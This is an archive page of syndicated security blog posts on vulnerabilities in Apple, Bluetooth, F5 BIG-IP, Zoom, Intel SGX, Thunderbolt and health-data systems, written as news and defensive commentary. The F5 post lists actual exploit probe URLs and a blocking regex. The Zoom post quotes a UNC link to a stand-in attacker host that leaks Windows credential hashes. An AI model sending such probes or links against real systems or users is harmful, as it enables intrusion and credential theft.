Tag Archives: vulnerabilities

Hacking Apple for Profit

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/10/hacking-apple-for-profit.html

Five researchers hacked Apple Computer’s networks — not their products — and found fifty-five vulnerabilities. So far, they have received $289K.

One of the worst of all the bugs they found would have allowed criminals to create a worm that would automatically steal all the photos, videos, and documents from someone’s iCloud account and then do the same to the victim’s contacts.

Lots of details in this blog post by one of the hackers.

Hacking a Coffee Maker

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/09/hacking-a-coffee-maker.html

As expected, IoT devices are filled with vulnerabilities:

As a thought experiment, Martin Hron, a researcher at security company Avast, reverse engineered one of the older coffee makers to see what kinds of hacks he could do with it. After just a week of effort, the unqualified answer was: quite a lot. Specifically, he could trigger the coffee maker to turn on the burner, dispense water, spin the bean grinder, and display a ransom message, all while beeping repeatedly. Oh, and by the way, the only way to stop the chaos was to unplug the power cord.

[…]

In any event, Hron said the ransom attack is just the beginning of what an attacker could do. With more work, he believes, an attacker could program a coffee maker — ­and possibly other appliances made by Smarter — ­to attack the router, computers, or other devices connected to the same network. And the attacker could probably do it with no overt sign anything was amiss.

New Bluetooth Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/09/new-bluetooth-vulnerability.html

There’s a new unpatched Bluetooth vulnerability:

The issue is with a protocol called Cross-Transport Key Derivation (or CTKD, for short). When, say, an iPhone is getting ready to pair up with Bluetooth-powered device, CTKD’s role is to set up two separate authentication keys for that phone: one for a “Bluetooth Low Energy” device, and one for a device using what’s known as the “Basic Rate/Enhanced Data Rate” standard. Different devices require different amounts of data — and battery power — from a phone. Being able to toggle between the standards needed for Bluetooth devices that take a ton of data (like a Chromecast), and those that require a bit less (like a smartwatch) is more efficient. Incidentally, it might also be less secure.

According to the researchers, if a phone supports both of those standards but doesn’t require some sort of authentication or permission on the user’s end, a hackery sort who’s within Bluetooth range can use its CTKD connection to derive its own competing key. With that connection, according to the researchers, this sort of erzatz authentication can also allow bad actors to weaken the encryption that these keys use in the first place — which can open its owner up to more attacks further down the road, or perform “man in the middle” style attacks that snoop on unprotected data being sent by the phone’s apps and services.

Another article:

Patches are not immediately available at the time of writing. The only way to protect against BLURtooth attacks is to control the environment in which Bluetooth devices are paired, in order to prevent man-in-the-middle attacks, or pairings with rogue devices carried out via social engineering (tricking the human operator).

However, patches are expected to be available at one point. When they’ll be, they’ll most likely be integrated as firmware or operating system updates for Bluetooth capable devices.

The timeline for these updates is, for the moment, unclear, as device vendors and OS makers usually work on different timelines, and some may not prioritize security patches as others. The number of vulnerable devices is also unclear and hard to quantify.

Many Bluetooth devices can’t be patched.

Final note: this seems to be another example of simultaneous discovery:

According to the Bluetooth SIG, the BLURtooth attack was discovered independently by two groups of academics from the École Polytechnique Fédérale de Lausanne (EPFL) and Purdue University.

Smart Lock Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/08/smart_lock_vuln.html

Yet another Internet-connected door lock is insecure:

Sold by retailers including Amazon, Walmart, and Home Depot, U-Tec’s $139.99 UltraLoq is marketed as a “secure and versatile smart deadbolt that offers keyless entry via your Bluetooth-enabled smartphone and code.”

Users can share temporary codes and ‘Ekeys’ to friends and guests for scheduled access, but according to Tripwire researcher Craig Young, a hacker able to sniff out the device’s MAC address can help themselves to an access key, too.

UltraLoq eventually fixed the vulnerabilities, but not in a way that should give you any confidence that they know what they’re doing.

EDITED TO ADD (8/12): More.

CVE-2020-5902: Helping to protect against the F5 TMUI RCE vulnerability

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/cve-2020-5902-helping-to-protect-against-the-f5-tmui-rce-vulnerability/

CVE-2020-5902: Helping to protect against the F5 TMUI RCE vulnerability

Cloudflare has deployed a new managed rule protecting customers against a remote code execution vulnerability that has been found in F5 BIG-IP’s web-based Traffic Management User Interface (TMUI). Any customer who has access to the Cloudflare Web Application Firewall (WAF) is automatically protected by the new rule (100315) that has a default action of BLOCK.

Initial testing on our network has shown that attackers started probing and trying to exploit this vulnerability starting on July 3.

F5 has published detailed instructions on how to patch affected devices, how to detect if attempts have been made to exploit the vulnerability on a device and instructions on how to add a custom mitigation. If you have an F5 device, read their detailed mitigations before reading the rest of this blog post.

The most popular probe URL appears to be /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp followed by /tmui/login.jsp/..;/tmui/util/getTabSet.jsp, /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp and /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp. All contain the critical pattern ..; which is at the heart of the vulnerability.

On July 3 we saw O(1k) probes ramping to O(1m) yesterday. This is because simple test patterns have been added to scanning tools and small test programs made available by security researchers.

CVE-2020-5902: Helping to protect against the F5 TMUI RCE vulnerability

The Vulnerability

The vulnerability was disclosed by the vendor on July 1 and allows both authenticated and unauthenticated users to perform remote code execution (RCE).

Remote Code Execution is a type of code injection which provides the attacker the ability to run any arbitrary code on the target application, allowing them, in most scenarios such as this one, to gain privileged access and perform a full system take over.

The vulnerability affects the administration interface only (the management dashboard), not the underlying data plane provided by the application.

How to Mitigate

If updating the application is not possible, the attack can be mitigated by blocking all requests that match the following regular expression in the URL:

.*\.\.;.*

The above regular expression matches two dot characters (.) followed by a semicolon within any sequence of characters.

Customers who are using the Cloudflare WAF, that have their F5 BIG-IP TMUI interface proxied behind Cloudflare, are already automatically protected from this vulnerability with rule 100315. If you wish to turn off the rule or change the default action:

  1. Head over to the Cloudflare Firewall, then click on Managed Rules and head over to the advanced link under the Cloudflare Managed Rule set,
  2. Search for rule ID: 100315,
  3. Select any appropriate action or disable the rule.

Facebook Helped Develop a Tails Exploit

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/facebook_helped.html

This is a weird story:

Hernandez was able to evade capture for so long because he used Tails, a version of Linux designed for users at high risk of surveillance and which routes all inbound and outbound connections through the open-source Tor network to anonymize it. According to Vice, the FBI had tried to hack into Hernandez’s computer but failed, as the approach they used “was not tailored for Tails.” Hernandez then proceeded to mock the FBI in subsequent messages, two Facebook employees told Vice.

Facebook had tasked a dedicated employee to unmasking Hernandez, developed an automated system to flag recently created accounts that messaged minors, and made catching Hernandez a priority for its security teams, according to Vice. They also paid a third party contractor “six figures” to help develop a zero-day exploit in Tails: a bug in its video player that enabled them to retrieve the real I.P. address of a person viewing a clip. Three sources told Vice that an intermediary passed the tool onto the FBI, who then obtained a search warrant to have one of the victims send a modified video file to Hernandez (a tactic the agency has used before).

[…]

Facebook also never notified the Tails team of the flaw — breaking with a long industry tradition of disclosure in which the relevant developers are notified of vulnerabilities in advance of them becoming public so they have a chance at implementing a fix. Sources told Vice that since an upcoming Tails update was slated to strip the vulnerable code, Facebook didn’t bother to do so, though the social media company had no reason to believe Tails developers had ever discovered the bug.

[…]

“The only acceptable outcome to us was Buster Hernandez facing accountability for his abuse of young girls,” a Facebook spokesperson told Vice. “This was a unique case, because he was using such sophisticated methods to hide his identity, that we took the extraordinary steps of working with security experts to help the FBI bring him to justice.”

I agree with that last paragraph. I’m fine with the FBI using vulnerabilities: lawful hacking, it’s called. I’m less okay with Facebook paying for a Tails exploit, giving it to the FBI, and then keeping its existence secret.

Another article.

EDITED TO ADD: This post has been translated into Portuguese.

Another Intel Speculative Execution Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/another_intel_s.html

Remember Spectre and Meltdown? Back in early 2018, I wrote:

Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they — and the research into the Intel ME vulnerability — have shown researchers where to look, more is coming — and what they’ll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.

That has turned out to be true. Here’s a new vulnerability:

On Tuesday, two separate academic teams disclosed two new and distinctive exploits that pierce Intel’s Software Guard eXtension, by far the most sensitive region of the company’s processors.

[…]

The new SGX attacks are known as SGAxe and CrossTalk. Both break into the fortified CPU region using separate side-channel attacks, a class of hack that infers sensitive data by measuring timing differences, power consumption, electromagnetic radiation, sound, or other information from the systems that store it. The assumptions for both attacks are roughly the same. An attacker has already broken the security of the target machine through a software exploit or a malicious virtual machine that compromises the integrity of the system. While that’s a tall bar, it’s precisely the scenario that SGX is supposed to defend against.

Another news article.

Security Analysis of the Democracy Live Online Voting System

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/security_analys_7.html

New research: “Security Analysis of the Democracy Live Online Voting System“:

Abstract: Democracy Live’s OmniBallot platform is a web-based system for blank ballot delivery, ballot marking, and (optionally) online voting. Three states — Delaware, West Virginia, and New Jersey — recently announced that they will allow certain voters to cast votes online using OmniBallot, but, despite the well established risks of Internet voting, the system has never been the subject of a public, independent security review.

We reverse engineered the client-side portion of OmniBallot, as used in Delaware, in order to detail the system’s operation and analyze its security.We find that OmniBallot uses a simplistic approach to Internet voting that is vulnerable to vote manipulation by malware on the voter’s device and by insiders or other attackers who can compromise Democracy Live, Amazon,Google, or Cloudflare. In addition, Democracy Live, which appears to have no privacy policy, receives sensitive personally identifiable information­ — including the voter’s identity, ballot selections, and browser fingerprint­ — that could be used to target political ads or disinformation campaigns.Even when OmniBallot is used to mark ballots that will be printed and returned in the mail, the software sends the voter’s identity and ballot choices to Democracy Live, an unnecessary security risk that jeopardizes the secret ballot. We recommend changes to make the platform safer for ballot delivery and marking. However, we conclude that using OmniBallot for electronic ballot return represents a severe risk to election security and could allow attackers to alter election results without detection.

News story.

EDITED TO ADD: This post has been translated into Portuguese.

Bluetooth Vulnerability: BIAS

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/05/bluetooth_vulne_1.html

This is new research on a Bluetooth vulnerability (called BIAS) that allows someone to impersonate a trusted device:

Abstract: Bluetooth (BR/EDR) is a pervasive technology for wireless communication used by billions of devices. The Bluetooth standard includes a legacy authentication procedure and a secure authentication procedure, allowing devices to authenticate to each other using a long term key. Those procedures are used during pairing and secure connection establishment to prevent impersonation attacks. In this paper, we show that the Bluetooth specification contains vulnerabilities enabling to perform impersonation attacks during secure connection establishment. Such vulnerabilities include the lack of mandatory mutual authentication, overly permissive role switching, and an authentication procedure downgrade. We describe each vulnerability in detail, and we exploit them to design, implement, and evaluate master and slave impersonation attacks on both the legacy authentication procedure and the secure authentication procedure. We refer to our attacks as Bluetooth Impersonation AttackS (BIAS).

Our attacks are standard compliant, and are therefore effective against any standard compliant Bluetooth device regardless the Bluetooth version, the security mode (e.g., Secure Connections), the device manufacturer, and the implementation details. Our attacks are stealthy because the Bluetooth standard does not require to notify end users about the outcome of an authentication procedure, or the lack of mutual authentication. To confirm that the BIAS attacks are practical, we successfully conduct them against 31 Bluetooth devices (28 unique Bluetooth chips) from major hardware and software vendors, implementing all the major Bluetooth versions, including Apple, Qualcomm, Intel, Cypress, Broadcom, Samsung, and CSR.

News articles.

Attack Against PC Thunderbolt Port

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/05/attack_against_2.html

The attack requires physical access to the computer, but it’s pretty devastating:

On Thunderbolt-enabled Windows or Linux PCs manufactured before 2019, his technique can bypass the login screen of a sleeping or locked computer — and even its hard disk encryption — to gain full access to the computer’s data. And while his attack in many cases requires opening a target laptop’s case with a screwdriver, it leaves no trace of intrusion and can be pulled off in just a few minutes. That opens a new avenue to what the security industry calls an “evil maid attack,” the threat of any hacker who can get alone time with a computer in, say, a hotel room. Ruytenberg says there’s no easy software fix, only disabling the Thunderbolt port altogether.

“All the evil maid needs to do is unscrew the backplate, attach a device momentarily, reprogram the firmware, reattach the backplate, and the evil maid gets full access to the laptop,” says Ruytenberg, who plans to present his Thunderspy research at the Black Hat security conference this summer­or the virtual conference that may replace it. “All of this can be done in under five minutes.”

Lots of details in the article above, and in the attack website. (We know it’s a modern hack, because it comes with its own website and logo.)

Intel responds.

EDITED TO ADD (5/14): More.

iOS XML Bug

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/05/ios_xml_bug.html

This is a good explanation of an iOS bug that allowed someone to break out of the application sandbox. A summary:

What a crazy bug, and Siguza’s explanation is very cogent. Basically, it comes down to this:

  • XML is terrible.
  • iOS uses XML for Plists, and Plists are used everywhere in iOS (and MacOS).
  • iOS’s sandboxing system depends upon three different XML parsers, which interpret slightly invalid XML input in slightly different ways.

So Siguza’s exploit ­– which granted an app full access to the entire file system, and more ­- uses malformed XML comments constructed in a way that one of iOS’s XML parsers sees its declaration of entitlements one way, and another XML parser sees it another way. The XML parser used to check whether an application should be allowed to launch doesn’t see the fishy entitlements because it thinks they’re inside a comment. The XML parser used to determine whether an already running application has permission to do things that require entitlements sees the fishy entitlements and grants permission.

This is fixed in the new iOS release, 13.5 beta 3.

Comment:

Implementing 4 different parsers is just asking for trouble, and the “fix” is of the crappiest sort, bolting on more crap to check they’re doing the right thing in this single case. None of this is encouraging.

More commentary. Hacker News thread.

Vulnerability Finding Using Machine Learning

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/vulnerability_f.html

Microsoft is training a machine-learning system to find software bugs:

At Microsoft, 47,000 developers generate nearly 30 thousand bugs a month. These items get stored across over 100 AzureDevOps and GitHub repositories. To better label and prioritize bugs at that scale, we couldn’t just apply more people to the problem. However, large volumes of semi-curated data are perfect for machine learning. Since 2001 Microsoft has collected 13 million work items and bugs. We used that data to develop a process and machine learning model that correctly distinguishes between security and non-security bugs 99 percent of the time and accurately identifies the critical, high priority security bugs, 97 percent of the time.

News article.

I wrote about this in 2018:

The problem of finding software vulnerabilities seems well-suited for ML systems. Going through code line by line is just the sort of tedious problem that computers excel at, if we can only teach them what a vulnerability looks like. There are challenges with that, of course, but there is already a healthy amount of academic literature on the topic — and research is continuing. There’s every reason to expect ML systems to get better at this as time goes on, and some reason to expect them to eventually become very good at it.

Finding vulnerabilities can benefit both attackers and defenders, but it’s not a fair fight. When an attacker’s ML system finds a vulnerability in software, the attacker can use it to compromise systems. When a defender’s ML system finds the same vulnerability, he or she can try to patch the system or program network defenses to watch for and block code that tries to exploit it.

But when the same system is in the hands of a software developer who uses it to find the vulnerability before the software is ever released, the developer fixes it so it can never be used in the first place. The ML system will probably be part of his or her software design tools and will automatically find and fix vulnerabilities while the code is still in development.

Fast-forward a decade or so into the future. We might say to each other, “Remember those years when software vulnerabilities were a thing, before ML vulnerability finders were built into every compiler and fixed them before the software was ever released? Wow, those were crazy years.” Not only is this future possible, but I would bet on it.

Getting from here to there will be a dangerous ride, though. Those vulnerability finders will first be unleashed on existing software, giving attackers hundreds if not thousands of vulnerabilities to exploit in real-world attacks. Sure, defenders can use the same systems, but many of today’s Internet of Things (IoT) systems have no engineering teams to write patches and no ability to download and install patches. The result will be hundreds of vulnerabilities that attackers can find and use.

Security and Privacy Implications of Zoom

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Window credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \\attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sort of mischief.

Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events: joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying them, looking for meetings. This isn’t new; Checkpoint Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.

EDITED TO ADD (4/4): New York City has banned Zoom from its schools.

Work-from-Home Security Advice

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/work-from-home_.html

SANS has made freely available its “Work-from-Home Awareness Kit.”

When I think about how COVID-19’s security measures are affecting organizational networks, I see several interrelated problems:

One, employees are working from their home networks and sometimes from their home computers. These systems are more likely to be out of date, unpatched, and unprotected. They are more vulnerable to attack simply because they are less secure.

Two, sensitive organizational data will likely migrate outside of the network. Employees working from home are going to save data on their own computers, where they aren’t protected by the organization’s security systems. This makes the data more likely to be hacked and stolen.

Three, employees are more likely to access their organizational networks insecurely. If the organization is lucky, they will have already set up a VPN for remote access. If not, they’re either trying to get one quickly or not bothering at all. Handing people VPN software to install and use with zero training is a recipe for security mistakes, but not using a VPN is even worse.

Four, employees are being asked to use new and unfamiliar tools like Zoom to replace face-to-face meetings. Again, these hastily set-up systems are likely to be insecure.

Five, the general chaos of “doing things differently” is an opening for attack. Tricks like business email compromise, where an employee gets a fake email from a senior executive asking him to transfer money to some account, will be more successful when the employee can’t walk down the hall to confirm the email’s validity — and when everyone is distracted and so many other things are being done differently.

Worrying about network security seems almost quaint in the face of the massive health risks from COVID-19, but attacks on infrastructure can have effects far greater than the infrastructure itself. Stay safe, everyone, and help keep your networks safe as well.

Security of Health Information

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/security_of_hea.html

The world is racing to contain the new COVID-19 virus that is spreading around the globe with alarming speed. Right now, pandemic disease experts at the World Health Organization (WHO), the US Centers for Disease Control and Prevention (CDC), and other public-health agencies are gathering information to learn how and where the virus is spreading. To do so, they are using a variety of digital communications and surveillance systems. Like much of the medical infrastructure, these systems are highly vulnerable to hacking and interference.

That vulnerability should be deeply concerning. Governments and intelligence agencies have long had an interest in manipulating health information, both in their own countries and abroad. They might do so to prevent mass panic, avert damage to their economies, or avoid public discontent (if officials made grave mistakes in containing an outbreak, for example). Outside their borders, states might use disinformation to undermine their adversaries or disrupt an alliance between other nations. A sudden epidemic­ — when countries struggle to manage not just the outbreak but its social, economic, and political fallout­ — is especially tempting for interference.

In the case of COVID-19, such interference is already well underway. That fact should not come as a surprise. States hostile to the West have a long track record of manipulating information about health issues to sow distrust. In the 1980s, for example, the Soviet Union spread the false story that the US Department of Defense bioengineered HIV in order to kill African Americans. This propaganda was effective: some 20 years after the original Soviet disinformation campaign, a 2005 survey found that 48 percent of African Americans believed HIV was concocted in a laboratory, and 15 percent thought it was a tool of genocide aimed at their communities.

More recently, in 2018, Russia undertook an extensive disinformation campaign to amplify the anti-vaccination movement using social media platforms like Twitter and Facebook. Researchers have confirmed that Russian trolls and bots tweeted anti-vaccination messages at up to 22 times the rate of average users. Exposure to these messages, other researchers found, significantly decreased vaccine uptake, endangering individual lives and public health.

Last week, US officials accused Russia of spreading disinformation about COVID-19 in yet another coordinated campaign. Beginning around the middle of January, thousands of Twitter, Facebook, and Instagram accounts­ — many of which had previously been tied to Russia­ — had been seen posting nearly identical messages in English, German, French, and other languages, blaming the United States for the outbreak. Some of the messages claimed that the virus is part of a US effort to wage economic war on China, others that it is a biological weapon engineered by the CIA.

As much as this disinformation can sow discord and undermine public trust, the far greater vulnerability lies in the United States’ poorly protected emergency-response infrastructure, including the health surveillance systems used to monitor and track the epidemic. By hacking these systems and corrupting medical data, states with formidable cybercapabilities can change and manipulate data right at the source.

Here is how it would work, and why we should be so concerned. Numerous health surveillance systems are monitoring the spread of COVID-19 cases, including the CDC’s influenza surveillance network. Almost all testing is done at a local or regional level, with public-health agencies like the CDC only compiling and analyzing the data. Only rarely is an actual biological sample sent to a high-level government lab. Many of the clinics and labs providing results to the CDC no longer file reports as in the past, but have several layers of software to store and transmit the data.

Potential vulnerabilities in these systems are legion: hackers exploiting bugs in the software, unauthorized access to a lab’s servers by some other route, or interference with the digital communications between the labs and the CDC. That the software involved in disease tracking sometimes has access to electronic medical records is particularly concerning, because those records are often integrated into a clinic or hospital’s network of digital devices. One such device connected to a single hospital’s network could, in theory, be used to hack into the CDC’s entire COVID-19 database.

In practice, hacking deep into a hospital’s systems can be shockingly easy. As part of a cybersecurity study, Israeli researchers at Ben-Gurion University were able to hack into a hospital’s network via the public Wi-Fi system. Once inside, they could move through most of the hospital’s databases and diagnostic systems. Gaining control of the hospital’s unencrypted image database, the researchers inserted malware that altered healthy patients’ CT scans to show nonexistent tumors. Radiologists reading these images could only distinguish real from altered CTs 60 percent of the time­ — and only after being alerted that some of the CTs had been manipulated.

Another study directly relevant to public-health emergencies showed that a critical US biosecurity initiative, the Department of Homeland Security’s BioWatch program, had been left vulnerable to cyberattackers for over a decade. This program monitors more than 30 US jurisdictions and allows health officials to rapidly detect a bioweapons attack. Hacking this program could cover up an attack, or fool authorities into believing one has occurred.

Fortunately, no case of healthcare sabotage by intelligence agencies or hackers has come to light (the closest has been a series of ransomware attacks extorting money from hospitals, causing significant data breaches and interruptions in medical services). But other critical infrastructure has often been a target. The Russians have repeatedly hacked Ukraine’s national power grid, and have been probing US power plants and grid infrastructure as well. The United States and Israel hacked the Iranian nuclear program, while Iran has targeted Saudi Arabia’s oil infrastructure. There is no reason to believe that public-health infrastructure is in any way off limits.

Despite these precedents and proven risks, a detailed assessment of the vulnerability of US health surveillance systems to infiltration and manipulation has yet to be made. With COVID-19 on the verge of becoming a pandemic, the United States is at risk of not having trustworthy data, which in turn could cripple our country’s ability to respond.

Under normal conditions, there is plenty of time for health officials to notice unusual patterns in the data and track down wrong information­ — if necessary, using the old-fashioned method of giving the lab a call. But during an epidemic, when there are tens of thousands of cases to track and analyze, it would be easy for exhausted disease experts and public-health officials to be misled by corrupted data. The resulting confusion could lead to misdirected resources, give false reassurance that case numbers are falling, or waste precious time as decision makers try to validate inconsistent data.

In the face of a possible global pandemic, US and international public-health leaders must lose no time assessing and strengthening the security of the country’s digital health systems. They also have an important role to play in the broader debate over cybersecurity. Making America’s health infrastructure safe requires a fundamental reorientation of cybersecurity away from offense and toward defense. The position of many governments, including the United States’, that Internet infrastructure must be kept vulnerable so they can better spy on others, is no longer tenable. A digital arms race, in which more countries acquire ever more sophisticated cyberattack capabilities, only increases US vulnerability in critical areas such as pandemic control. By highlighting the importance of protecting digital health infrastructure, public-health leaders can and should call for a well-defended and peaceful Internet as a foundation for a healthy and secure world.

This essay was co-authored with Margaret Bourdeaux; a slightly different version appeared in Foreign Policy.

EDITED TO ADD: On last week’s squid post, there was a big conversation regarding the COVID-19. Many of the comments straddled the line between what are and aren’t the the core topics. Yesterday I deleted a bunch for being off-topic. Then I reconsidered and republished some of what I deleted.

Going forward, comments about the COVID-19 will be restricted to the security and risk implications of the virus. This includes cybersecurity, security, risk management, surveillance, and containment measures. Comments that stray off those topics will be removed. By clarifying this, I hope to keep the conversation on-topic while also allowing discussion of the security implications of current events.

Thank you for your patience and forbearance on this.

Let’s Encrypt Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/lets_encrypt_vu.html

The BBC is reporting a vulnerability in the Let’s Encrypt certificate service:

In a notification email to its clients, the organisation said: “We recently discovered a bug in the Let’s Encrypt certificate authority code.

“Unfortunately, this means we need to revoke the certificates that were affected by this bug, which includes one or more of your certificates. To avoid disruption, you’ll need to renew and replace your affected certificate(s) by Wednesday, March 4, 2020. We sincerely apologise for the issue.”

I am seeing nothing on the Let’s Encrypt website. And no other details anywhere. I’ll post more when I know more.

EDITED TO ADD: More from Ars Technica:

Let’s Encrypt uses Certificate Authority software called Boulder. Typically, a Web server that services many separate domain names and uses Let’s Encrypt to secure them receives a single LE certificate that covers all domain names used by the server rather than a separate cert for each individual domain.

